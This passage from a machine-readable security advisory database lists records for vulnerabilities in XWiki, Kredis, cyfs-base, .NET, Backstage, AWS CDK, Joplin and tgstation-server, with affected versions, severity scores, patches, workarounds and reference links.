[{'type': 'ECOSYSTEM', 'events': [{'introduced': '9.6-rc-1'}, {'fixed': '14.10.6'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-notifications-ui'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '15.0-rc-1'}, {'fixed': '15.2-rc-1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-94pf-92hw-2hjc'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-36469'}, {'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-platform/commit/217e5bb7a657f2991b154a16ef4d5ae9c29ad39c'}, {'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-platform/commit/217e5bb7a657f2991b154a16ef4d5ae9c29ad39c#diff-7221a548809fa2ba34348556f4b5bd436463c559ebdf691197932ee7ce4478ca'}, {'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-platform/commit/217e5bb7a657f2991b154a16ef4d5ae9c29ad39c#diff-b261c6eac3108c3e6e734054c28a78f59d3439ab72fe8582dadf87670a0d15a4'}, {'type': 'PACKAGE', 'url': 'https://github.com/xwiki/xwiki-platform'}, {'type': 'WEB', 'url': 'https://jira.xwiki.org/browse/XWIKI-20610'}]","{'cwe_ids': ['CWE-74'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-06-30T20:42:02Z', 'nvd_published_at': None}" 1.4.0,GHSA-h2wm-p2vg-6pw4,2023-06-20T14:21:48Z,2023-06-09T22:40:54Z,,['CVE-2023-27531'],Kredis JSON Possible Deserialization of Untrusted Data Vulnerability,"There is a deserialization of untrusted data vulnerability in the Kredis JSON deserialization code. This vulnerability has been assigned the CVE identifier CVE-2023-27531. 'Not affected: None.' 'Versions Affected: All.' 'Fixed Versions: 1.3.0.1' Impact Carefully crafted JSON data processed by Kredis may result in deserialization of untrusted data, potentially leading to deserialization of unexpected objects in the system. Any applications using Kredis with JSON are affected. Releases The fixed releases are available at the normal locations. Workarounds There are no feasible workarounds for this issue. Patches To aid users who aren’t able to upgrade immediately we have provided patches for the two supported release series. They are in git-am format and consist of a single changeset. * 1-3-0-1-kredis.patch - Patch for 1.3.0 series Credits Thank you ooooooo_k 7 for reporting this! ",[],"[{'package': {'ecosystem': 'RubyGems', 'name': 'kredis'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.3.0.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/rails/kredis/commit/d576b7ae5c8d3d74eeb4bd84cad0aa64ffc299fa'}, {'type': 'WEB', 'url': 'https://discuss.rubyonrails.org/t/cve-2023-27531-possible-deserialization-of-untrusted-data-vulnerability-in-kredis-json/82467#post_1'}, {'type': 'PACKAGE', 'url': 'https://github.com/rails/kredis'}, {'type': 'WEB', 'url': 'https://github.com/rails/kredis/releases/tag/v1.3.0.1'}, {'type': 'WEB', 'url': 'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/kredis/CVE-2023-27531.yml'}]","{'cwe_ids': ['CWE-502'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-06-09T22:40:54Z', 'nvd_published_at': None}" 1.4.0,GHSA-g753-ghr7-q33w,2023-06-22T20:01:55Z,2023-06-22T20:01:55Z,,[],cyfs-base vulnerable to misaligned pointer dereference in `ChunkId::new`,"The function `ChunkId::new` creates a misaligned pointer by casting mutable pointer of `u8` slice which has alignment 1 to the mutable pointer of `u32` which has alignment 4, and dereference the misaligned pointer leading UB, which should not be allowed in safe function. ",[],"[{'package': {'ecosystem': 'crates.io', 'name': 'cyfs-base'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.6.12'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/buckyos/CYFS/issues/275'}, {'type': 'WEB', 'url': 'https://github.com/buckyos/CYFS/commit/e030188895096fd8d91d48753877729f4d37dd24'}, {'type': 'PACKAGE', 'url': 'https://github.com/buckyos/CYFS'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2023-0046.html'}]","{'cwe_ids': [], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-06-22T20:01:55Z', 'nvd_published_at': None}" 1.4.0,GHSA-x469-cv7m-77r9,2023-06-14T17:17:02Z,2023-06-14T17:17:02Z,,['CVE-2023-33128'],.NET Remote Code Execution Vulnerability,"# Microsoft Security Advisory CVE-2023-33128: .NET Remote Code Execution Vulnerability ## Executive summary Microsoft is releasing this security advisory to provide information about a vulnerability in .NET 7.0. This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability. A vulnerability exists in .NET source generator for P/Invokes that can lead to generated code freeing uninitialized memory and crashing. ## Announcement Announcement for this issue can be found at https://github.com/dotnet/announcements/issues/253 ### Mitigation factors Microsoft has not identified any mitigating factors for this vulnerability. ## Affected software * Any .NET 7.0.1xx SDK 7.0.106 or earlier. * Any .NET 7.0.3xx SDK 7.0.303 or earlier. If your application uses the following package versions, ensure you update to the latest version of .NET. ### .NET 7 Package name | Affected version | Patched version ------------ | ---------------- | ------------------------- [Microsoft.NetCore.App.Runtime.linux-arm](https://www.nuget.org/packages/Microsoft.NetCore.App.Runtime.linux-arm) | >= 7.0.0, <= 7.0.5 | 7.0.7 [Microsoft.NetCore.App.Runtime.linux-arm64](https://www.nuget.org/packages/Microsoft.NetCore.App.Runtime.linux-arm64) | >= 7.0.0, <= 7.0.5 | 7.0.7 [Microsoft.NetCore.App.Runtime.linux-musl-arm](https://www.nuget.org/packages/Microsoft.NetCore.App.Runtime.linux-musl-arm) | >= 7.0.0, <= 7.0.5 | 7.0.7 [Microsoft.NetCore.App.Runtime.linux-musl-arm64](https://www.nuget.org/packages/Microsoft.NetCore.App.Runtime.linux-musl-arm64) | >= 7.0.0, <= 7.0.5 | 7.0.7 [Microsoft.NetCore.App.Runtime.linux-musl-x64](https://www.nuget.org/packages/Microsoft.NetCore.App.Runtime.linux-musl-x64) | >= 7.0.0, <= 7.0.5 | 7.0.7 [Microsoft.NetCore.App.Runtime.linux-x64](https://www.nuget.org/packages/Microsoft.NetCore.App.Runtime.linux-x64) | >= 7.0.0, <= 7.0.5 | 7.0.7 [Microsoft.NetCore.App.Runtime.osx-arm64](https://www.nuget.org/packages/Microsoft.NetCore.App.Runtime.osx-arm64) | >= 7.0.0, <= 7.0.5 | 7.0.7 [Microsoft.NetCore.App.Runtime.osx-x64](https://www.nuget.org/packages/Microsoft.NetCore.App.Runtime.osx-x64) | >= 7.0.0, <= 7.0.5 | 7.0.7 [Microsoft.NetCore.App.Runtime.win-arm](https://www.nuget.org/packages/Microsoft.NetCore.App.Runtime.win-arm) | >= 7.0.0, <= 7.0.5 | 7.0.7 [Microsoft.NetCore.App.Runtime.win-arm64](https://www.nuget.org/packages/Microsoft.NetCore.App.Runtime.win-arm64) | >= 7.0.0, <= 7.0.5 | 7.0.7 [Microsoft.NetCore.App.Runtime.win-x64](https://www.nuget.org/packages/Microsoft.NetCore.App.Runtime.win-x64) | >= 7.0.0, <= 7.0.5 | 7.0.7 [Microsoft.NetCore.App.Runtime.win-x86](https://www.nuget.org/packages/Microsoft.NetCore.App.Runtime.win-x86) | >= 7.0.0, <= 7.0.5 | 7.0.7 ## Advisory FAQ ### How do I know if I am affected? If you have a runtime or SDK with a version listed, or an affected package listed in [affected software](#affected-software), you're exposed to the vulnerability. ### How do I fix the issue? * To fix the issue please install the latest version of .NET 7.0. If you have installed one or more .NET SDKs through Visual Studio, Visual Studio will prompt you to update Visual Studio, which will also update your .NET SDKs. * If you are using one of the affected packages, please update to the patched version listed above. * If you are a library author and have used one of the affected versions listed above, please update, recompile, and redistribute your libraries. * If you have .NET 7.0 or greater installed, you can list the versions you have installed by running the `dotnet --info` command. You will see output like the following; ``` .NET Core SDK (reflecting any global.json): Version: 6.0.300 Commit: 8473146e7d Runtime Environment: OS Name: Windows OS Version: 10.0.18363 OS Platform: Windows RID: win10-x64 Base Path: C:\Program Files\dotnet\sdk\6.0.300\ Host (useful for support): Version: 6.0.5 Commit: 8473146e7d .NET Core SDKs installed: 6.0.300 [C:\Program Files\dotnet\sdk] .NET Core runtimes installed: Microsoft.AspNetCore.App 6.0.5 [C:\Program Files\dotnet\shared\Microsoft.AspNetCore.App] Microsoft.NETCore.App 6.0.5 [C:\Program Files\dotnet\shared\Microsoft.NETCore.App] Microsoft.WindowsDesktop.App 6.0.5 [C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App] To install additional .NET Core runtimes or SDKs: https://aka.ms/dotnet-download ``` * If you're using .NET 7.0, you should download and install Runtime 7.0.7 or SDK 7.0.106 (for Visual Studio 2022 v17.4) from https://dotnet.microsoft.com/download/dotnet-core/7.0. .NET 7.0 updates are also available from Microsoft Update. To access this either type ""Check for updates"" in your Windows search, or open Settings, choose Update & Security and then click Check for Updates. Once you have installed the updated runtime or SDK, restart your apps for the update to take effect. Additionally, if you've deployed [self-contained applications](https://docs.microsoft.com/dotnet/core/deploying/#self-contained-deployments-scd) targeting any of the impacted versions, these applications are also vulnerable and must be recompiled and redeployed. ## Other Information ### Reporting Security Issues If you have found a potential security issue in .NET 7.0, please email details to secure@microsoft.com. Reports may qualify for the Microsoft .NET Core & .NET 5 Bounty. Details of the Microsoft .NET Bounty Program including terms and conditions are at . ### Support You can ask questions about this issue on GitHub in the .NET GitHub organization. The main repos are located at https://github.com/dotnet/runtime and https://github.com/dotnet/aspnet/. The Announcements repo (https://github.com/dotnet/Announcements) will contain this bulletin as an issue and will include a link to a discussion issue. You can ask questions in the linked discussion issue. ### Disclaimer The information provided in this advisory is provided ""as is"" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. ### External Links [CVE-2023-33128]( https://www.cve.org/CVERecord?id=2023-33128) ### Revisions V1.0 (June 13, 2023): Advisory published. _Version 1.0_ _Last Updated 2023-06-13_","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.NetCore.App.Runtime.linux-arm'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.0.0'}, {'fixed': '7.0.7'}]}], 'database_specific': {'last_known_affected_version_range': '<= 7.0.5'}}, {'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.NetCore.App.Runtime.linux-arm64'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.0.0'}, {'fixed': '7.0.7'}]}], 'database_specific': {'last_known_affected_version_range': '<= 7.0.5'}}, {'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.NetCore.App.Runtime.linux-musl-arm'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.0.0'}, {'fixed': '7.0.7'}]}], 'database_specific': {'last_known_affected_version_range': '<= 7.0.5'}}, {'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.NetCore.App.Runtime.linux-musl-arm64'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.0.0'}, {'fixed': '7.0.7'}]}], 'database_specific': {'last_known_affected_version_range': '<= 7.0.5'}}, {'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.NetCore.App.Runtime.linux-musl-x64'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.0.0'}, {'fixed': '7.0.7'}]}], 'database_specific': {'last_known_affected_version_range': '<= 7.0.5'}}, {'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.NetCore.App.Runtime.linux-x64'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.0.0'}, {'fixed': '7.0.7'}]}], 'database_specific': {'last_known_affected_version_range': '<= 7.0.5'}}, {'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.NetCore.App.Runtime.osx-arm64'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.0.0'}, {'fixed': '7.0.7'}]}], 'database_specific': {'last_known_affected_version_range': '<= 7.0.5'}}, {'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.NetCore.App.Runtime.osx-x64'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.0.0'}, {'fixed': '7.0.7'}]}], 'database_specific': {'last_known_affected_version_range': '<= 7.0.5'}}, {'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.NetCore.App.Runtime.win-arm'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.0.0'}, {'fixed': '7.0.7'}]}], 'database_specific': {'last_known_affected_version_range': '<= 7.0.5'}}, {'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.NetCore.App.Runtime.win-arm64'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.0.0'}, {'fixed': '7.0.7'}]}], 'database_specific': {'last_known_affected_version_range': '<= 7.0.5'}}, {'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.NetCore.App.Runtime.win-x64'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.0.0'}, {'fixed': '7.0.7'}]}], 'database_specific': {'last_known_affected_version_range': '<= 7.0.5'}}, {'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.NetCore.App.Runtime.win-x86'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.0.0'}, {'fixed': '7.0.7'}]}], 'database_specific': {'last_known_affected_version_range': '<= 7.0.5'}}]","[{'type': 'WEB', 'url': 'https://github.com/dotnet/sdk/security/advisories/GHSA-x469-cv7m-77r9'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-33128'}, {'type': 'WEB', 'url': 'https://github.com/dotnet/announcements/issues/253'}, {'type': 'PACKAGE', 'url': 'https://github.com/dotnet/sdk'}, {'type': 'WEB', 'url': 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-33128'}]","{'cwe_ids': [], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-06-14T17:17:02Z', 'nvd_published_at': None}" 1.4.0,GHSA-wg6p-jmpc-xjmr,2023-06-21T22:00:30Z,2023-06-21T22:00:30Z,,['CVE-2023-35926'],Backstage Scaffolder plugin has insecure sandbox,"The Backstage scaffolder-backend plugin uses a templating library that requires a sandbox, as it by design allows for code injection. The library used for this sandbox so far has been `vm2`, but in light of several past vulnerabilities and existing vulnerabilities that may not have a fix, the plugin has switched to using a different sandbox library. ### Impact A malicious actor with write access to a registered scaffolder template could manipulate the template in a way that allows for remote code execution on the scaffolder-backend instance. This was only exploitable in the template YAML definition itself and not by user input data. ### Patches This is vulnerability is fixed in version 1.15.0 of `@backstage/plugin-scaffolder-backend`. ### Workarounds Note that the [Backstage Threat Model](https://backstage.io/docs/overview/threat-model) states that scaffolder templates are considered to be a sensitive area that with the recommendation that you control access and perform manual reviews of changes to the scaffolder templates. The exploit is of a nature where it is easily discoverable in manual review.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': '@backstage/plugin-scaffolder-backend'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.15.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/backstage/backstage/security/advisories/GHSA-wg6p-jmpc-xjmr'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-35926'}, {'type': 'WEB', 'url': 'https://github.com/backstage/backstage/commit/fb7375507d56faedcb7bb3665480070593c8949a'}, {'type': 'PACKAGE', 'url': 'https://github.com/backstage/backstage'}, {'type': 'WEB', 'url': 'https://github.com/backstage/backstage/releases/tag/v1.15.0'}]","{'cwe_ids': ['CWE-94'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-06-21T22:00:30Z', 'nvd_published_at': None}" 1.4.0,GHSA-jh2h-qcrw-ghg7,2023-06-14T17:02:24Z,2023-06-14T17:02:24Z,,['CVE-2023-24895'],.NET Remote Code Execution Vulnerability,"# Microsoft Security Advisory CVE-2023-24895: .NET Remote Code Execution Vulnerability ## Executive summary Microsoft is releasing this security advisory to provide information about a vulnerability in .NET 7.0 and .NET 6.0. This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability. A vulnerability exists in how WPF applications load and render XPS documents which may result in remote code execution. ## Announcement Announcement for this issue can be found at https://github.com/dotnet/announcements/issues/261 ### Mitigation factors Microsoft has not identified any mitigating factors for this vulnerability. ## Affected software * Any .NET 7.0 application running on .NET 7.0.5 or earlier. * Any .NET 6.0 application running on .NET 6.0.16 or earlier. If your application uses the following package versions, ensure you update to the latest version of .NET. ### .NET 7 Package name | Affected version | Patched version ------------ | ---------------- | ------------------------- [Microsoft.WindowsDesktop.App.Runtime.win-arm64](https://www.nuget.org/packages/Microsoft.WindowsDesktop.App.Runtime.win-arm64) | >= 7.0.0, <= 7.0.5 | 7.0.7 [Microsoft.WindowsDesktop.App.Runtime.win-x64](https://www.nuget.org/packages/Microsoft.WindowsDesktop.App.Runtime.win-x64) | >= 7.0.0, <= 7.0.5 | 7.0.7 [Microsoft.WindowsDesktop.App.Runtime.win-x86](https://www.nuget.org/packages/Microsoft.WindowsDesktop.App.Runtime.win-x86) | >= 7.0.0, <= 7.0.5 | 7.0.7 ### .NET 6 Package name | Affected version | Patched version ------------ | ---------------- | ------------------------- [Microsoft.WindowsDesktop.App.Runtime.win-arm64](https://www.nuget.org/packages/Microsoft.WindowsDesktop.App.Runtime.win-arm64) | >= 6.0.0, <= 6.0.16 | 6.0.18 [Microsoft.WindowsDesktop.App.Runtime.win-x64](https://www.nuget.org/packages/Microsoft.WindowsDesktop.App.Runtime.win-x64) | >= 6.0.0, <= 6.0.16 | 6.0.18 [Microsoft.WindowsDesktop.App.Runtime.win-x86](https://www.nuget.org/packages/Microsoft.WindowsDesktop.App.Runtime.win-x86) | >= 6.0.0, <= 6.0.16 | 6.0.18 ## Advisory FAQ ### How do I know if I am affected? If you have a runtime or SDK with a version listed, or an affected package listed in [affected software](#affected-software), you're exposed to the vulnerability. ### How do I fix the issue? * To fix the issue please install the latest version of .NET 6.0 or .NET 7.0. If you have installed one or more .NET SDKs through Visual Studio, Visual Studio will prompt you to update Visual Studio, which will also update your .NET SDKs. * If you are using one of the affected packages, please update to the patched version listed above. * If you have .NET 6.0 or greater installed, you can list the versions you have installed by running the `dotnet --info` command. You will see output like the following; ``` .NET Core SDK (reflecting any global.json): Version: 6.0.300 Commit: 8473146e7d Runtime Environment: OS Name: Windows OS Version: 10.0.18363 OS Platform: Windows RID: win10-x64 Base Path: C:\Program Files\dotnet\sdk\6.0.300\ Host (useful for support): Version: 6.0.5 Commit: 8473146e7d .NET Core SDKs installed: 6.0.300 [C:\Program Files\dotnet\sdk] .NET Core runtimes installed: Microsoft.AspNetCore.App 6.0.5 [C:\Program Files\dotnet\shared\Microsoft.AspNetCore.App] Microsoft.NETCore.App 6.0.5 [C:\Program Files\dotnet\shared\Microsoft.NETCore.App] Microsoft.WindowsDesktop.App 6.0.5 [C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App] To install additional .NET Core runtimes or SDKs: https://aka.ms/dotnet-download ``` * If you're using .NET 7.0, you should download and install Runtime 7.0.7 or SDK 7.0.106 (for Visual Studio 2022 v17.4) from https://dotnet.microsoft.com/download/dotnet-core/7.0. * If you're using .NET 6.0, you should download and install Runtime 6.0.18 or SDK 6.0.312 (for Visual Studio 2022 v17.2) from https://dotnet.microsoft.com/download/dotnet-core/6.0. .NET 6.0 and and .NET 7.0 updates are also available from Microsoft Update. To access this either type ""Check for updates"" in your Windows search, or open Settings, choose Update & Security and then click Check for Updates. Once you have installed the updated runtime or SDK, restart your apps for the update to take effect. Additionally, if you've deployed [self-contained applications](https://docs.microsoft.com/dotnet/core/deploying/#self-contained-deployments-scd) targeting any of the impacted versions, these applications are also vulnerable and must be recompiled and redeployed. ## Other Information ### Reporting Security Issues If you have found a potential security issue in .NET 6.0 or .NET 7.0, please email details to secure@microsoft.com. Reports may qualify for the Microsoft .NET Core & .NET 5 Bounty. Details of the Microsoft .NET Bounty Program including terms and conditions are at . ### Support You can ask questions about this issue on GitHub in the .NET GitHub organization. The main repos are located at https://github.com/dotnet/runtime and https://github.com/dotnet/aspnet/. The Announcements repo (https://github.com/dotnet/Announcements) will contain this bulletin as an issue and will include a link to a discussion issue. You can ask questions in the linked discussion issue. ### Disclaimer The information provided in this advisory is provided ""as is"" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. ### External Links [CVE-2023-24895]( https://www.cve.org/CVERecord?id=2023-24895) ### Revisions V1.0 (June 13, 2023): Advisory published. _Version 1.0_ _Last Updated 2023-05-09_","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.WindowsDesktop.App.Runtime.win-arm64'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.0.0'}, {'fixed': '7.0.7'}]}], 'database_specific': {'last_known_affected_version_range': '<= 7.0.5'}}, {'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.WindowsDesktop.App.Runtime.win-x64'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.0.0'}, {'fixed': '7.0.7'}]}], 'database_specific': {'last_known_affected_version_range': '<= 7.0.5'}}, {'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.WindowsDesktop.App.Runtime.win-x86'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.0.0'}, {'fixed': '7.0.7'}]}], 'database_specific': {'last_known_affected_version_range': '<= 7.0.5'}}, {'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.WindowsDesktop.App.Runtime.win-arm64'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.0.0'}, {'fixed': '6.0.18'}]}], 'database_specific': {'last_known_affected_version_range': '<= 6.0.16'}}, {'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.WindowsDesktop.App.Runtime.win-x64'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.0.0'}, {'fixed': '6.0.18'}]}], 'database_specific': {'last_known_affected_version_range': '<= 6.0.16'}}, {'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.WindowsDesktop.App.Runtime.win-x86'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.0.0'}, {'fixed': '6.0.18'}]}], 'database_specific': {'last_known_affected_version_range': '<= 6.0.16'}}]","[{'type': 'WEB', 'url': 'https://github.com/dotnet/wpf/security/advisories/GHSA-jh2h-qcrw-ghg7'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-24895'}, {'type': 'WEB', 'url': 'https://github.com/dotnet/announcements/issues/261'}, {'type': 'PACKAGE', 'url': 'https://github.com/dotnet/wpf'}, {'type': 'WEB', 'url': 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-24895'}]","{'cwe_ids': [], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-06-14T17:02:24Z', 'nvd_published_at': None}" 1.4.0,GHSA-rx28-r23p-2qc3,2023-06-20T18:06:03Z,2023-06-19T22:47:26Z,,['CVE-2023-35165'],AWS CDK EKS overly permissive trust policies,"If you are using the `eks.Cluster` or `eks.FargateCluster` construct we need you to take action. Other users are not affected and can stop reading. ### Impact The AWS Cloud Development Kit (CDK) allows for the definition of Amazon Elastic Container Service for Kubernetes (EKS) clusters. `eks.Cluster` and `eks.FargateCluster` constructs create two roles that have an overly permissive trust policy. The first, referred to as the _CreationRole_, is used by lambda handlers to create the cluster and deploy Kubernetes resources (e.g `KubernetesManifest`, `HelmChart`, ...) onto it. Users with CDK version higher or equal to [1.62.0](https://github.com/aws/aws-cdk/releases/tag/v1.62.0) (including v2 users) will be affected. The second, referred to as the _default MastersRole_, is provisioned only if the `mastersRole` property isn't provided and has permissions to execute `kubectl` commands on the cluster. Users with CDK version higher or equal to [1.57.0](https://github.com/aws/aws-cdk/releases/tag/v1.57.0) (including v2 users) will be affected. Both these roles use the account root principal in their trust policy, which allows any identity in the account with the appropriate `sts:AssumeRole `permissions to assume it. For example, this can happen if another role in your account has `sts:AssumeRole` permissions on `Resource: ""*""`. #### CreationRole Users with CDK version higher or equal to [1.62.0](https://github.com/aws/aws-cdk/releases/tag/v1.62.0) (including v2 users). The role in question can be located in the IAM console. It will have the following name pattern: ```console *-ClusterCreationRole-* ``` #### MastersRole Users with CDK version higher or equal to [1.57.0](https://github.com/aws/aws-cdk/releases/tag/v1.57.0) (including v2 users) that are not specifying the `mastersRole` property. The role in question can be located in the IAM console. It will have the following name pattern: ```console *-MastersRole-* ``` ### Patches The issue has been fixed in versions [v1.202.0](https://github.com/aws/aws-cdk/releases/tag/v1.202.0), [v2.80.0](https://github.com/aws/aws-cdk/releases/tag/v2.80.0). We recommend you upgrade to a fixed version as soon as possible. See [Managing Dependencies](https://docs.aws.amazon.com/cdk/v2/guide/manage-dependencies.html) in the CDK Developer Guide for instructions on how to do this. The new versions no longer use the account root principal. Instead, they restrict the trust policy to the specific roles of lambda handlers that need it. This introduces some breaking changes that might require you to perform code changes. Refer to https://github.com/aws/aws-cdk/issues/25674 for a detailed discussion of options. ### Workarounds #### CreationRole There is no workaround available for CreationRole. #### MastersRole To avoid creating the _default MastersRole_, use the `mastersRole` property to explicitly provide a role. For example: ```ts new eks.Cluster(this, 'Cluster', { ... mastersRole: iam.Role.fromRoleArn(this, 'Admin', 'arn:aws:iam::xxx:role/Admin') }); ``` ### References [https://github.com/aws/aws-cdk/issues/25674](https://github.com/aws/aws-cdk/issues/25674) If you have any questions or comments about this advisory we ask that you contact AWS/Amazon Security via our [vulnerability reporting page](https://aws.amazon.com/security/vulnerability-reporting) or directly via email to [aws-security@amazon.com](mailto:aws-security@amazon.com). Please do not create a public GitHub issue.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'aws-cdk-lib'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '2.80.0'}]}]}, {'package': {'ecosystem': 'npm', 'name': '@aws-cdk/aws-eks'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.57.0'}, {'fixed': '1.202.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/aws/aws-cdk/security/advisories/GHSA-rx28-r23p-2qc3'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-35165'}, {'type': 'WEB', 'url': 'https://github.com/aws/aws-cdk/issues/25674'}, {'type': 'PACKAGE', 'url': 'https://github.com/aws/aws-cdk'}]","{'cwe_ids': ['CWE-266', 'CWE-863'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-06-19T22:47:26Z', 'nvd_published_at': None}" 1.4.0,GHSA-4jjv-p8x9-rrf7,2023-07-06T21:39:13Z,2023-06-30T15:30:22Z,,['CVE-2023-37299'],Joplin Cross-site Scripting vulnerability,Joplin before 2.11.5 allows XSS via an AREA element of an image map.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'joplin'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.11.5'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-37299'}, {'type': 'WEB', 'url': 'https://github.com/laurent22/joplin/commit/9e90d9016daf79b5414646a93fd369aedb035071'}, {'type': 'PACKAGE', 'url': 'https://github.com/laurent22/joplin'}, {'type': 'WEB', 'url': 'https://github.com/laurent22/joplin/releases/tag/v2.11.5'}, {'type': 'WEB', 'url': 'https://vuln.ryotak.net/advisories/68'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-06-30T20:39:42Z', 'nvd_published_at': None}" 1.4.0,GHSA-42r6-p4px-qvv6,2023-06-12T20:30:27Z,2023-06-12T20:30:27Z,,['CVE-2018-17107'],tgstation-server cached user logins in legacy server,"Please note this advisory is for a historical preexisting issue in the legacy server from 2018. It has long since been triaged. It is being moved here for visibility. The text below is copied from the original issue #690 # You can login to the server with any username/password combination if someone else is logged in An explanation of the bug: Back in 3.2.1.0, in order to accommodate running the Control Panel using Mono some hooks were added to the WCF communication layer. Detailed in this commit: https://github.com/tgstation/tgstation-server/commit/2894ea03d708c7f16bab47ba5020c2ad4c3d5554#diff-0ba090ea7073a3a304dfdbdfc512f733 The bug was in this line: 